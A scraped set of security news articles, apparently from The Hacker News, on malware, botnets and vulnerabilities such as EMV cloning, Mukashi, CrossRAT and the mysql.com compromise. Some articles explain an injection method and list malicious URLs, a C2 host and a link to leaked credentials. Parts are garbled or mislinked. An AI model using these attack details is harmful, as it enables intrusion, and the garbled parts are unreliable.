Pre-Play Vulnerability Allows Chip-and-PIN Payment Card Cloning,https://thehackernews.com/2014/05/pre-play-vulnerability-allows-chip-and.html,"In March this year, we reported that the major card distributor companies, VISA and Mastercard are migrating to EMV chip cards, also known as PIN-and-Chip cards. Unlike traditional magnetic stripe payment cards, EMV chip cards generates a unique code for every transaction, making it nearly* impossible for criminals to use the card for counterfeit fraud.
But Nothing is perfectly secure, even not the PIN-and-Chip based payment cards. All anti-cloning theories were already proven wrong, when a group of researchers found a way to hack the Credit and Debit cards based on the latest Chip-and-Pin technology.
Back in 2012, we reported about a research paper entitled ""Chip and Skim: cloning EMV cards with the pre-play attack"" published (old paper) by team of researchers from the University of Cambridge, UK, who demonstrated that Chip and PIN payment card systems are also vulnerable to Card Cloning.
The same team of researchers presented their EVM related research last Monday at the 2014 IEEE Symposium on Security and Privacy in San Jose, California. But this time they include one more critical vulnerability to the research paper (new modified research paper).
The Group includes Mike Bond, Omar Choudary, Steven J. Murdoch, Sergei Skorobogatov and Ross Anderson from the Computer Science Department. In Total, they presented two critical vulnerabilities in the ""Chip-and-PIN"" smart card payment system that makes EVM vulnerable to ""pre-play"" attack.
EMV devices generate the so-called ""unpredictable numbers"" (UNs) for every transaction, but the researchers claimed that automated teller machines (ATMs) and point-of-sale (POS) terminals fail to properly generate random numbers that are required by the EMV protocol to securely authenticate transaction requests.
Researchers claimed to have found the computation patterns that would allow them to predict the randomly generated numbers. 'EMV implementers have merely used counters, timestamps or home-grown algorithms to supply this nonce.'
The vulnerability could be exploited by the cybercriminals to clone the credit and debit cards in such a manner that even bank procedures won't differentiate between the legitimate and fraud transactions.
They also demonstrated the Proof-of-Concept of another critical vulnerability, known as 'no PIN', which lets criminals use stolen chip and PIN cards without knowing the PIN.
Using a Malware or by performing a man-in-the-middle attack on the communications between a pin terminal and a customer's card allows the hacker to read off sufficient information to create a cloned card.
""The flaw is that when you put a card into a terminal, a negotiation takes place about how the cardholder should be authenticated: using a PIN, using a signature or not at all. This particular subprotocol is not authenticated, so you can trick the card into thinking it's doing a chip-and-signature transaction while the terminal thinks it's chip-and-PIN. The upshot is that you can buy stuff using a stolen card and a PIN of 0000 (or anything you want). We did so, on camera, using various journalists' cards. The transactions went through fine and the receipts say 'Verified by PIN'."" the researcher explained.
The worst fact about the vulnerability is that, the trick is already known to cyber criminals and fraudsters from past many months and currently they are even equipped with crime-ware hardwares those allow them to clone Chin-and-PIN based cards easily.
The Chip-and-PIN system has a 700-odd page manual, but the researchers says it has so many security holes in it, the whole thing should be re-written.
The adoption of EVM payment system is in the response to the massive data breach in one of the U.S largest retailers 'Target', marked the largest card heists in the U.S. history in which financial credentials of more than 110 million customers were compromised.
The data heist in various US retailers have forced them to take some major steps towards more secure transactions and they move on to the new Chip-and-Pin technology. However, Chip-and-Pin payment system is considered to be a safer than the ""card swipe"" payment system, but that doesn't mean it is fully protected. Cyber Criminals are just behind you every time to fetch your money, so be alert.
"Zemra Botnet Leaked, Cyber Criminals performing DDoS Attacks",https://thehackernews.com/2012/06/zemra-botnet-leaked-cyber-criminals.html,"Zemra Botnet Leaked, Cyber Criminals performing DDoS Attacks
The Zemra DDoS Bot is currently sold in various forums for about 100 € and detected by Symantec as Backdoor.Zemra. Zemra first appeared on underground forums in May 2012.
This crimeware pack is similar to other crime packs, such as Zeus and SpyEye, in that is has a command-and-control panel hosted on a remote server.
Zemra uses a simple panel with an overview of all statistics is needed.With the help of two graphs can be seen operating machinery and the region location.In addition, statistics on online and for more information. You have a chance to see everything online Socks5 and export them to the list.Traffic is encrypted and protected using the algorithm AES, each client communicates with a unique generated key.
Note : In ""Tools Yard"" we have Posted Zemra Source Code, Only for Educational Purpose.
A brief functional:
• Intuitive control panel
• DDos (HTTP / SYN Flood / UDP)
• Loader (Load and run).
• Cheat visits (visits to the page views).
• USB Spread (spread through flash drives)
• Socks5 (picks up socks proxy on the infected machine)
• Update (Updates the bot)
• [color = red] The process can not be completed because the He is critical.
• 256 Bit AES encryption of traffic from the bot to the server
• Anti-Debugger
• There is a choice of a particular country bots perform the job
After inspecting the source code, symantec identifies that two types of DDoS attacks that have been implemented into this bot: HTTP flood and SYN flood.
""To reduce the possibility of being infected by this Trojan, Symantec advises users to ensure that they are using the latest Symantec protection technologies with the latest antivirus definitions installed."" Symantec suggest in a blog post.
"FAQ : DNSChanger Trojan, Impact and Solutions",https://thehackernews.com/2012/02/faq-dnschanger-trojan-impact-and.html,"FAQ : DNSChanger Trojan, Impact and Solutions
Two days before we (THN) Reported that FBI will shutdown Internet on 8th March, Title seems to be more Attention seeking , Why ? Well ! Our job is to aware you about the Internet Security. If we are looking for some extra attention from our Readers then its part of our small effort to make Internet more secure space for all.
Today we are going to Explain all about DNSChanger Trojan, its Impact on Internet users and the biggest challenge for FBI to resolve it, and How a non technical user can check and Restore its computer, Hope you will share this article with your Friends, Followers and On your Site to aware them about this Serial Internet Killer.
What is DNS (Domain Name System) ? is an Internet service that converts user-friendly domain names into the numerical Internet protocol (IP) addresses that computers use to talk to each other. When you enter a domain name, such as www.thehackernews.com, in your web browser address bar, your computer contacts DNS servers to determine the IP address for the website. Your computer then uses this IP address to locate and connect to the website. DNS servers are operated by your Internet service provider (ISP) and are included in your computer's network configuration. DNS and DNS Servers are a critical component of your computer's operating environment without them, you would not be able to access websites, send e-mail, or use any other Internet services.
What is DNSChanger ? a small file about 1.5 kilobytes , DNSChanger is a trojan that will change the infected system's Domain Name Server (DNS) settings, in order to divert traffic to unsolicited, and potentially illegal sites. This Trojan is designed to change the 'NameServer' Registry key value to a custom IP address. This IP address is usually encrypted in the body of a trojan.
When ? The DNSChanger malware was first discovered around 2007, and since this time has infected millions of computers, around 500,000 of them being in the U.S., and through these computers the criminals have reportedly pulled in around $14 million in stolen funds. The FBI has uncovered a network of rogue DNS servers and has taken steps to disable it.The FBI is also undertaking an effort to identify and notify victims who have been impacted by the DNSChanger malware.
Who are infected and Technical Info ? Both Windows and MacOS users are at risk for this infection because it exploits your browser, not your operating system.Here are some known hostile IP address pairs used by the DNS Changer malware: - - - - - -
Why its not easy Remove this Trojan ? One consequence of disabling the rogue DNS network is that victims who rely on the rogue DNS network for DNS service could lose access to DNS services, So This Process will start on March 8 by FBI.
Why 8th March 2012 ? After the take down of the DNSChange Botnet, in November 2011, the FBI obtained a court order allowing the FBI to set up a temporary DNSChanger Command & Control network. The court order expires on March 8th, 2012. Unless the FBI obtains a new court order allowing them to continue operating the temporary network, the network will be turned off. Resulting in millions of computers, world-wide, no longer being able to access the Internet.
How to check manually that your System is Infected or Not ? The best way to determine if your computer has been affected by DNSChanger is to have them evaluated by a computer professional.
Avira cooperated also with the German Federal Office for Information Security (BSI) and published the tool also on the special website created to check if the DNS requests are made to the right places: www.DNS-OK.de. Besides the website, users can also OK DNS, the DNS-repair tool from the Avira website to download here.
After 8th March all computer will be Secured ? According to FBI, It is quite possible that computers infected with this malware may also be infected with other malware. The establishment of these clean DNS servers does not guarantee that the computers are safe from other malware. The main intent is to ensure users do not lose DNS service.
Parliament Of Botswana hacked by V0iD,https://thehackernews.com/2011/07/0day-unrealircd-32x-all-versions-remote.html,"Parliament Of Botswana hacked by V0iD
V0iD hacker again strike with Parliament Of Botswana https://www.parliament.gov.bw/ . Hacker Releases the database table information and Admin users login details at https://pastebin.com/Ts21HhEz .
Mukashi: A New Mirai IoT Botnet Variant Targeting Zyxel NAS Devices,https://thehackernews.com/2020/03/zyxel-mukashi-mirai-iot-botnet.html,"A new version of the infamous Mirai botnet is exploiting a recently uncovered critical vulnerability in network-attached storage (NAS) devices in an attempt to remotely infect and control vulnerable machines.
Called ""Mukashi,"" the new variant of the malware employs brute-force attacks using different combinations of default credentials to log into Zyxel NAS, UTM, ATP, and VPN firewall products to take control of the devices and add them to a network of infected bots that can be used to carry out Distributed Denial of Service (DDoS) attacks.
Multiple Zyxel NAS products running firmware versions up to 5.21 are vulnerable to the compromise, Palo Alto Networks' Unit 42 global threat intelligence team said, adding they uncovered the first such exploitation of the flaw in the wild on March 12.
Zyxel's Pre-Authentication Command Injection Flaw
Mukashi hinges on a pre-authentication command injection vulnerability (tracked as CVE-2020-9054), for which a proof-of-concept was only made publicly available last month. The flaw resides in a ""weblogin.cgi"" program used by the Zyxel devices, thereby potentially allowing attackers to perform remote code execution via command injection.
""The executable weblogin.cgi doesn't properly sanitize the username parameter during authentication. The attacker can use a single quote (') to close the string and a semicolon (;) to concat arbitrary commands to achieve command injection,"" according to Unit 42 researchers. ""Since weblogin.cgi accepts both HTTP GET and POST requests, the attacker can embed the malicious payload in one of these HTTP requests and gain code execution.""
Zyxel issued a patch for the vulnerability last month after it emerged that precise instructions for exploiting the flaw were being sold in underground cybercrime forums for $20,000 for use against targets. But the update doesn't address the flaw on many older unsupported devices.
As a workaround, the Taiwan-based networking equipment maker has urged users of those affected models to not leave the products directly exposed to the Internet, and connect them to a security router or firewall for additional protection.
Mukashi Targets Zyxel NAS Devices
Just like other Mirai variants, Mukashi operates by scanning the Internet for vulnerable IoT devices like routers, NAS devices, security cameras, and digital video recorders (DVRs), looking for potential hosts that are protected only by factory-default credentials or commonly-used passwords to co-opt them into the botnet.
If a brute-force login turns out to be successful, Mukashi not only reports the login attempt to a remote attacker-controlled command-and-control (C2) server but also awaits further commands to launch DDoS attacks.
""When it's executed, Mukashi prints the message 'Protecting your device from further infections.' to the console,"" Unit42 researchers said. ""The malware then proceeds to change its process name to dvrhelper, suggesting Mukashi may inherit certain traits from its predecessor.""
Mirai's History of DDoS attacks
The Mirai botnet, since its discovery in 2016, has been linked to a string of large-scale DDoS attacks, including one against DNS service provider Dyn in October 2016, causing major internet platforms and services to remain inaccessible to users in Europe and North America.
Since then, numerous variants of Mirai have sprung up, in part due to the availability of its source code on the Internet since 2016.
It's recommended that all Zyxel consumers download the firmware update to protect devices from Mukashi hijacks. Updating default credentials with complex login passwords can also go a long way towards preventing such brute-force attacks.
The full list of Zyxel products affected by the flaw is available here. You can also test if a Zyxel NAS device is vulnerable here.
New Banking Malware with Network Sniffer Spreading Rapidly Worldwide,https://thehackernews.com/2014/06/new-banking-malware-with-network.html,"The hike in the banking malware this year is no doubt almost double compared to the previous one, and so in the techniques of malware authors.
Until now, we have seen banking Trojans affecting devices and steal users' financial credentials in order to run them out of their money. But nowadays, malware authors are adopting more sophisticated techniques in an effort to target as many victims as possible.
Security researchers from the Anti-virus firm Trend Micro have discovered a new variant of banking malware that not only steals users' information from the device it has infected but, has ability to ""sniff"" network activity in an effort to compromise the devices of same network users as well.
The banking malware, dubbed as EMOTET spreads rapidly through spammed emails that masquerade itself as a bank transfers and shipping invoices. The spammed email comes along with an attached link that users easily click, considering that the emails refer to their bank or financial transactions.
Once clicked, the malware get installed into users' system that further downloads its component files, including a configuration and .DLL file. The configuration files contains information about the banks targeted by the malware, whereas the .DLL file is responsible for intercepting and logging outgoing network traffic.
The .DLL file is injected to all processes of the system, including web browser and then ""this malicious DLL compares the accessed site with the strings contained in the previously downloaded configuration file, wrote Joie Salvio, security researcher at Trend Micro. ""If strings match, the malware assembles the information by getting the URL accessed and the data sent.""
Meanwhile, the malware stores stolen data in the separate entries after been encrypted, which means the malware can steal and save any information the attacker wants.
""The decision to storing files and data in registry entries could be seen as a method of evasion"", Salvio said. ""Regular users often do not check registry entries for possibly malicious or suspicious activity, compared to checking for new or unusual files. It can also serve as a countermeasure against file-based AV detection for that same reason.""
Moreover, the malware has ability to even bypass the secure HTTPs connection which poses more danger to users' personal information and banking credentials, as users will feel free to continue their online banking without even realizing that their information is being stolen.
""[It has] capability to hook to the following Network APIs to monitor network traffic: PR_OpenTcpSocket PR_Write PR_Close PR_GetNameForIndentity Closesocket Connect Send WsaSend""
This kind of financial threat is really dangerous for the people, because previous banking malwares often rely on form field insertion or phishing pages to steal users' financial information, but the use of network sniffing in the malware, makes the threat even more harder for users to detect any suspicious activity as no changes are visibly seen, said the researcher.
Researchers are still investigating that how the malware sends the gathered data sniffed from the network to the attacker.
The malware infection is not targeted to any specific region or country but, EMOTET malware family is largely infecting the users of EMEA region, i.e. Europe, the Middle East and Africa, with Germany on the top of the affected countries.
Users are advised to do not open or click on links and attachments provided in any suspicious email, but if the message is from your banking institution and of concern to you, then confirm it twice before proceeding.
Critical vulnerability in Twitter allows attacker to upload Unrestricted Files,https://thehackernews.com/2013/10/critical-vulnerability-in-twitter.html,"Security expert Ebrahim Hegazy, Cyber Security Analyst Consultant at Q-CERT, has found a serious vulnerability in Twitter that allows an attacker to upload files of any extension including PHP.
When an application does not validate or improperly validates file types before uploading files to the system, called Unrestricted File upload vulnerability. Such flaws allow an attacker to upload and execute arbitrary code on the target system which could result in execution of arbitrary HTML and script code or system compromise.
According to Ebrahim, when a developer creates a new application for Twitter i.e. dev.twitter.com - they have an option to upload an image for that application.
While uploading the image, the Twitter server will check for the uploaded files to accept certain image extensions only, like PNG, JPG and other extensions won't get uploaded.
But in a Video Proof of Concept he demonstrated that, a vulnerability allowed him to bypass this security validation and an attacker can successfully upload .htaccess and .PHP files to twimg.com server.
Twimg.com is working as a CDN (content delivery network) which mean that every time attacker will upload a file, it will be hosted on a different server or subdomain of twimg.com.
In CDN's usually scripting engines are not allowed to run. So, in normal scenarios a successful Exploitation of uploading htaccess & PHP files to a server that supports the PHP i.e. Remote Code Execution on that server.
But in the case of Twitter:
Vulnerability could be used to make twimg.com as a Botnet Command server by hosting a text file with commands, so infected machines would connect to that file to take its commands. Since twimg.com is a trusted domain by users so it won't grab the attention.
For hosting of malicious files.
At least it could be used to upload a text page with a defacement content and then add the infected sub-domains of twimg.com as a mirror to Zone-h.org which would affect the reputation of Twitter.
Twitter recognized the criticality of the Unrestricted File Upload Vulnerability and added Hegazy name to their Hall of Fame. I personally reached Ebrahim Hegazy that revealed me that he has also found an Open redirection Vulnerability in Twitter on 15th Sept. that has also been fixed.
I conclude with a personal consideration, it's shame Twitter hasn't a bounty program, in my opinion is fundamental to incentive hackers to ethical disclosure of the bug. An attack against a social media could have serious repercussion on the users and on the reputation of the platform, if hackers sell the knowledge of the flaw on the black market a growing number of cyber criminals could benefit from it.
"Beware! Undetectable CrossRAT malware targets Windows, MacOS, and Linux systems",https://thehackernews.com/2018/01/crossrat-malware.html,"Are you using Linux or Mac OS? If you think your system is not prone to viruses, then you should read this.
Wide-range of cybercriminals are now using a new piece of 'undetectable' spying malware that targets Windows, macOS, Solaris and Linux systems.
Just last week we published a detailed article on the report from EFF/Lookout that revealed a new advanced persistent threat (APT) group, called Dark Caracal, engaged in global mobile espionage campaigns.
Although the report revealed about the group's successful large-scale hacking operations against mobile phones rather than computers, it also shed light on a new piece of cross-platform malware called CrossRAT (version 0.1), which is believed to be developed by, or for, the Dark Caracal group.
CrossRAT is a cross-platform remote access Trojan that can target all four popular desktop operating systems, Windows, Solaris, Linux, and macOS, enabling remote attackers to manipulate the file system, take screenshots, run arbitrary executables, and gain persistence on the infected systems.
According to researchers, Dark Caracal hackers do not rely on any ""zero-day exploits"" to distribute its malware; instead, it uses basic social engineering via posts on Facebook groups and WhatsApp messages, encouraging users to visit hackers-controlled fake websites and download malicious applications.
CrossRAT is written in Java programming language, making it easy for reverse engineers and researchers to decompile it.
Since at the time of writing only two out of 58 popular antivirus solutions (according to VirusTotal) can detect CrossRAT, ex-NSA hacker Patrick Wardle decided to analyse the malware and provide a comprehensive technical overview including its persistence mechanism, command and control communication as well as its capabilities.
CrossRAT 0.1 — Cross-Platform Persistent Surveillance Malware
Once executed on the targeted system, the implant (hmar6.jar) first checks the operating system it's running on and then installs itself accordingly.
Besides this, the CrossRAT implant also attempts to gather information about the infected system, including the installed OS version, kernel build and architecture.
Moreover, for Linux systems, the malware also attempts to query systemd files to determine its distribution, like Arch Linux, Centos, Debian, Kali Linux, Fedora, and Linux Mint, among many more.
CrossRAT then implements OS specific persistence mechanisms to automatically (re)executes whenever the infected system is rebooted and register itself to the C&C server, allowing remote attackers to send command and exfiltrate data.
As reported by Lookout researchers, CrossRAT variant distributed by Dark Caracal hacking group connects to 'flexberry(dot)com' on port 2223, whose information is hardcoded in the 'crossrat/k.class' file.
CrossRAT Includes Inactive Keylogger Module
The malware has been designed with some basic surveillance capabilities, which get triggered only when received respective predefined commands from the C&C server.
Interestingly, Patrick noticed that the CrossRAT has also been programmed to use 'jnativehook,' an open-source Java library to listen to keyboard and mouse events, but the malware does not have any predefined command to activate this keylogger.
""However, I didn't see any code within that implant that referenced the jnativehook package—so at this point it appears that this functionality is not leveraged? There may be a good explanation for this. As noted in the report, the malware identifies it's version as 0.1, perhaps indicating it's still a work in progress and thus not feature complete,"" Patrick said.
How to Check If You're Infected with CrossRAT?
Since CrossRAT persists in an OS-specific manner, detecting the malware will depend on what operating system you are running.
For Windows:
Check the 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run\' registry key.
If infected it will contain a command that includes, java, -jar and mediamgrs.jar.
For macOS:
Check for jar file, mediamgrs.jar, in ~/Library.
Also look for launch agent in /Library/LaunchAgents or ~/Library/LaunchAgents named mediamgrs.plist.
For Linux:
Check for jar file, mediamgrs.jar, in /usr/var.
Also look for an 'autostart' file in the ~/.config/autostart likely named mediamgrs.desktop.
How to Protect Against CrossRAT Trojan?
Only 2 out of 58 antivirus products detect CrossRAT at the time of writing, which means that your AV would hardly protect you from this threat.
""As CrossRAT is written in Java, it requires Java to be installed. Luckily recent versions of macOS do not ship with Java,"" Patrick said.
""Thus, most macOS users should be safe! Of course, if a Mac user already has Java installed, or the attacker is able to coerce a naive user to install Java first, CrossRAT will run just dandy, even on the latest version of macOS (High Sierra).""
Users are advised to install behaviour-based threat detection software. Mac users can use BlockBlock, a simple utility developed by Patrick that alerts users whenever anything is persistently installed.
"Mysql.com hacked, serving BlackHole exploit malware",https://thehackernews.com/2011/09/mysqlcom-hacked-serving-blackhole.html,"Mysql.com hacked, serving BlackHole exploit malware
MySQL.com website is currently hacked and compromised with a JavaScript malware (and serving malware to anyone visiting it). The mysql.com website is injected with a script that generates an iFrame that redirects the visitors to https://truruhfhqnviaosdpruejeslsuy.cx.cc/main.php, where the BlackHole exploit pack is hosted.
""It exploits the visitor's browsing platform (the browser, the browser plugins like Adobe Flash, Adobe PDF, etc, Java, ...), and upon successful exploitation, permanently installs a piece of malware into the visitor's machine, without the visitor's knowledge,"" say the researchers. ""The visitor doesn't need to click or agree to anything; simply visiting mysql.com with a vulnerable browsing platform will result in an infection.""
It is, of course, impossible to say who the attackers are. The domain reached through the iFrame is registered to one Christopher J Klein from Miami and is located in Berlin, Germany. The domain serving the exploit and the malware is located in Stockholm, Sweden.The administrators of the mysql.com domain are being contacted, but the site is still up and compromised, say the researchers.
Apple Strongly Denies Claims of Installing iOS Backdoor,https://thehackernews.com/2014/07/apple-strongly-denies-claims-of_22.html,"The allegations from a data forensic expert and security researcher that iOS contains a ""backdoor"" permitting third parties to potentially gain access to large amount of users' personal data instigated Apple to give a strong response.
The company has completely denied to the claims published over the weekend by Jonathan Zdziarski, a forensic scientist and iOS security expert.
The researcher, better identified as the hacker moniker ""NerveGas"", detailed a number of undocumented features in a paper presentation titled, ""Identifying Backdoors, Attack Points, and Surveillance Mechanisms in iOS Devices"" showing his findings, from his talk at the Hackers On Planet Earth (HOPE X) conference held in New York on Friday.
The issue, what he explained in his finding, arises from the way Apple encrypts or fails to encrypt data from the iPhone's native apps, leaving over 600 million personal iOS devices vulnerable to third parties.
""Once the device is first unlocked after reboot, most of the data-protection encrypted data can be accessed until the device is shut down,"" Zdziarski wrote in his presentation. ""Your device is almost always at risk of spilling all data, since it's almost always authenticated, even while locked.""
The researcher claimed to have found several undocumented features within iOS that could be used to access users' information, including photos, address-book information, voicemail messages, and more.
The personal information stored on your phone is at great risk, which includes a full copy of the user's address book including deleted entries, stored photos, the voicemail database and audio files, any account data configured on the device such as iCloud, email, Facebook, Twitter, and other services, the user cache of screenshots, keystrokes and the device's clipboard, as well as location information.
In response, Apple has released a statement to Tim Bradshaw, a tech reporter at the Financial Times, denying those allegations and wrote:
""We have designed iOS so that its diagnostic functions do not compromise user privacy and security, but still provides needed information to enterprise IT departments, developers and Apple for troubleshooting technical issues. A user must have unlocked their device and agreed to trust another computer before that computer is able to access this limited diagnostic data. The user must agree to share this information, and data is never transferred without their consent.""
Apple also says in its statement that as it has said before, it ""has never worked with any government agency from any country to create a backdoor in any of our products or services.""
Apple has described several diagnostic capabilities offered in iOS in response to the backdoor access claims. The company has published a support document on its website outlining the three iOS diagnostic capabilities pointed out by the researcher. They are as follows:
pcapd supports diagnostic packet capture from an iOS device to a trusted computer. This is useful for troubleshooting and diagnosing issues with apps on the device as well as enterprise VPN connections. You can find more information at developer.apple.com/library/ios/qa/qa1176.
file_relay supports limited copying of diagnostic data from a device. This service is separate from user-generated backups, does not have access to all data on the device, and respects iOS Data Protection. Apple engineering uses file_relay on internal devices to qualify customer configurations. AppleCare, with user consent, can also use this tool to gather relevant diagnostic data from users' devices.
house_arrest is used by iTunes to transfer documents to and from an iOS device for apps that support this functionality. This is also used by Xcode to assist in the transfer of test data to a device while an app is in development.
In addition, Apple reiterates on the support document page that access to these diagnostic capabilities requires an unlocked iOS device and a trusted computer, which protects against data extraction from an unknown Mac or PC. It also notes that any transferred data is encrypted with keys not shared with the company.
All OnePlus Devices Vulnerable to Remote Attacks Due to 4 Unpatched Flaws,https://thehackernews.com/2017/05/oneplus-mobile-vulnerabilities.html,"There is a bad news for all OnePlus lovers.
A security researcher has discovered four vulnerabilities that affect all OnePlus handsets, including One, X, 2, 3 and 3T, running the latest versions of OxygenOS 4.1.3 (worldwide) and below, as well as HydrogenOS 3.0 and below (for Chinese users).
Damn, I am feeling bad, I myself use OnePlus.
One of the unpatched vulnerabilities allows Man-in-the-Middle (MitM) attack against OnePlus device users, allowing a remote attacker to downgrade the device's operating system to an older version, which could then expand the attack surface for exploitation of previously disclosed now-patched vulnerabilities.
What's even worse? The other two vulnerabilities also allow an MitM attacker to replace any version of OxygenOS with HydrogenOS (or vice versa), as well as to replace the operating system with a completely different malicious ROM loaded with spying apps.
The vulnerabilities have been discovered by Roee Hay of Aleph Research, HCL Technologies, who reported them to the company in January this year.
However, when OnePlus failed to release patches for the issues even after 90 days of responsible disclosure, and 14 days of additional ultimatum, the researcher decided to go public with the details of the vulnerabilities, which are described below.
1 — OnePlus OTA Updates Over HTTP: CVE-2016-10370
It's 2017, and you would be shocked to know that one of the popular device manufacturers is sending you OS updates and security patches over an unencrypted channel.
Roee Hay and Sagi Kedmi, who also independently discovered it, claims that OnePlus is delivering signed-OTA (over-the-air) updates over HTTP without TLS, allowing remote attackers to perform MitM attacks.
Since the OTA updates are signed with a digital signature, this bug alone is not sufficient to push malicious updates to the affected devices.
But this weakness facilitates other three below-reported vulnerabilities, which could allow an attacker to defeat the digital signature mechanism as well.
2 — OnePlus OTA Downgrade Attack: CVE-2017-5948
This flaw allows a remote attacker to downgrade the operating system of a targeted OnePlus device, either running on OxygenOS or HydrogenOS, to an earlier version that may contain vulnerabilities disclosed previously.
Since all the OnePlus OTAs of different ROMs and products are signed by the same digital key, the device will accept and install any OTA image, even if the bootloader is locked.
Android devices mostly have a logical code that does not allow users to downgrade their OS, but OnePlus fails here as well. It does not check if the currently installed version of the OS is lower than or equal to the given OTA image.
OnePlus 3T, OnePlus 3, OnePlus 2, OnePlus X and OnePlus One are affected by this vulnerability.
The researcher has also published proof-of-concept (PoC) code on GitHub.
3 — OxygenOS/HydrogenOS Crossover Attack: CVE-2017-8850
The second flaw listed above also allows a remote attacker to replace any version of OxygenOS on a targeted OnePlus device with any version of HydrogenOS, even on locked bootloaders.
This attack is possible because ""the fact (that) both ROMs use the same OTA verification keys,""
According to the researcher, OnePlus 3T, OnePlus 3, OnePlus 2, OnePlus X and OnePlus One are affected by this vulnerability as well.
The researcher has also published proof-of-concept (PoC) for this flaw on GitHub.
4 — OnePlus OTA One/X Crossover Attack: CVE-2017-8851
This flaw, which only affects OnePlus X and OnePlus One, is practically same as the above two, but in this case, a remote MiTM attacker can even replace the OS (Oxygen/Hydrogen) designed for OnePlus X with the OS (Oxygen/Hydrogen) designed for OnePlus One, even on locked bootloaders.
This is because both the devices ""use the same OTA verification keys"" and ""share the same ro.build.product system property.""
""That could theoretically allow for exploitation of vulnerabilities patched on one image but not on the other, in addition to the expansion of the attack surface,"" Hay says. ""Moreover, the vulnerability may result in having the device unusable until a Factory Reset is performed.""
You can check the proof-of-concept exploit for this vulnerability here.
All the above flaws exist only because OnePlus is not using secure communication for delivering OTA updates, and can be patched easily just by introducing HTTPS/TLS implementation.
Since the exploitation requires the attacker and the targeted device to be on the same network, users are advised to avoid connecting to untrusted or public Wi-Fi networks.
Hacking Team Spyware preloaded with UEFI BIOS Rootkit to Hide Itself,https://thehackernews.com/2015/07/hacking-uefi-bios-rootkit.html,"Last Week someone just hacked the infamous Hacking Team, The Italy-based cyber weapons manufacturer and leaked a huge trove of 400GB internal data, including:
Hacking tools
Zero-day exploits
Surveillance tools
Source code for Spyware
A spreadsheet listing every government client with date of purchase and amount paid
Hacking Team is known for its advanced and sophisticated Remote Control System (RCS) spyware, also known as Galileo, which is loaded with lots of zero-day exploits and have ability to monitor the computers of its targets remotely.
Today, Trend Micro security researchers found that the Hacking Team ""uses a UEFI (Unified Extensible Firmware Interface) BIOS Rootkit to keep their Remote Control System (RCS) agent installed in their targets' systems.""
That clearly means, even if the user reinstalls the Operating System, formats the hard disk, and even buys a new hard disk, the agents are implanted after Microsoft Windows is up and running.
According to researchers, Hacking Team's rootkit malware is only able to target UEFI BIOS systems developed by Insyde and AMI vendors, used by the majority of computer and laptop manufacturers.
However, at this time researchers are not sure whether the malware can complete the rootkit installation without physical access to the target machine, as the installation requires BIOS flashing process that can't be done without rebooting into the machine into UEFI (Unified Extensible Firmware Interface) shell.
The BIOS rootkit analysis done by Trend Micro researchers was only made possible due to the Spyware source code leaked online in the Hacking Team data dumps.
So far, three Adobe Flash zero-day vulnerabilities and an Android zero-day exploit have been discovered from the Hacking Team leaked files, although this BIOS rootkit spreads more light on the team's activities.
The affected victims are yet unknown. However to keep yourself safe, we recommend you always to keep your BIOS up-to-date and protected by enabling password. Also, make sure to enable UEFI SecureFlash.
Hackers Who Hit Winter Olympics 2018 Are Still Alive and Kicking,https://thehackernews.com/2018/06/olympic-destroyer-malware.html,"Remember the 'Olympic Destroyer' cyber attack?
The group behind it is still alive, kicking and has now been found targeting biological and chemical threat prevention laboratories in Europe and Ukraine, and a few financial organisation in Russia.
Earlier this year, an unknown group of notorious hackers targeted Winter Olympic Games 2018, held in South Korea, using a destructive malware that purposely planted sophisticated false flags to trick researchers into mis-attributing the campaign.
Unfortunately, the destructive malware was successful to some extent, at least for a next few days, as immediately after the attack various security researchers postmortem the Olympic Destroyer malware and started attributing the attack to different nation-state hacking groups from North Korea, Russia, and China.
Later researchers from Russian antivirus vendor Kaspersky Labs uncovered more details about the attack, including the evidence of false attribution artifacts, and concluded that the whole attack was a masterful operation in deception.
Now according to a new report published today by Kaspersky Labs, the same group of hackers, which is still unattributed, has been found targeting organisations in Russia, Ukraine, and several European countries in May and June 2018, specifically those organizations that respond to and protect against biological and chemical threats.
New Attack Shares Similarities With Olympic Destroyer
During their investigation, researchers found that the exploitation and deception tactics used by the newly discovered campaign share many similarities with the Olympic Destroyer attack.
""In May-June 2018 we discovered new spear-phishing documents that closely resembled weaponized documents used by Olympic Destroyer in the past,"" the researchers said. ""They continue to use a non-binary executable infection vector and obfuscated scripts to evade detection.""
Just like Olympic Destroyer, the new attack also targets users affiliated with specific organisations using spear-phishing emails that appear as coming from an acquaintance, with an attached document.
If the victims open the malicious document, it leverages macros to download and execute multiple PowerShell scripts in the background and install the final 3rd-stage payload to take remote control over the victims' system.
Researchers found that the technique used to obfuscate and decrypt the malicious code is same as used in the original Olympic Destroyer spear-phishing campaign.
The second-stage script disables Powershell script logging to avoid leaving traces and then downloads the final ""Powershell Empire agent"" payload, which allows fileless control of the compromised systems over an encrypted communication channel.
Hackers Target Biological and Chemical Threat Prevention Laboratories
According to the researchers, the group has attempted to gain access to computers in countries, including France, Germany, Switzerland, Russia, and Ukraine.
Researchers found evidence of hackers primarily targeting people affiliated with an upcoming biochemical threat conference, called Spiez Convergence, held in Switzerland and organized by Spiez Laboratory.
Spiez Laboratory played an essential role in investigating the poisoning in March of a former Russian spy in the UK. The U.K. and the U.S. both said Russia was behind the poisoning and expelled dozens of Russian diplomats.
Another document targeted Ministry of Health in Ukraine.
It is not yet known that who behind these attacks, but Kaspersky advises all biochemical threat prevention and research organizations to strengthen their IT security and run unscheduled security audits.
"In-Brief: Spotify Hack, Secret of Chrome OS, MIT Bug Bounty, Nanowire Batteries",https://thehackernews.com/2016/04/hacking-news-brief-1.html,"1. Spotify Hacked! Change your Password ASAP
If you are one of the millions of people around the world who love to listen to music on Spotify, you may need to change your password immediately.
Has Spotify been hacked? The company says no, but some Spotify users have claimed their profiles were hijacked, and details were changed without knowledge, including passwords and email addresses, TC reported.
Spotify apparently suffered a security breach that leaked hundreds of Spotify accounts details, including emails, usernames, passwords and account type, which was published last week to the popular anonymous file sharing website Pastebin.
Spotify is investigating the Pastebin leaks of Spotify user information.
2. Over 1 Million Android Apps Are Coming to Chrome OS
Google is ready to integrate millions of Android applications onto its Chrome OS platform by bringing the entire Play Store to it.
Redditor 'TheWiseYoda' first spotted a new option to ""Enable Android Apps to run on your Chromebook"" on the developer version of Chrome OS, though the option popped up for an instant and then disappeared.
After hunting in the source code of the operating system, the Redditor discovered a couple of references to the feature that indicate the arrival of Google Play on Chrome OS.
3. MIT University Launches Bug Bounty Program
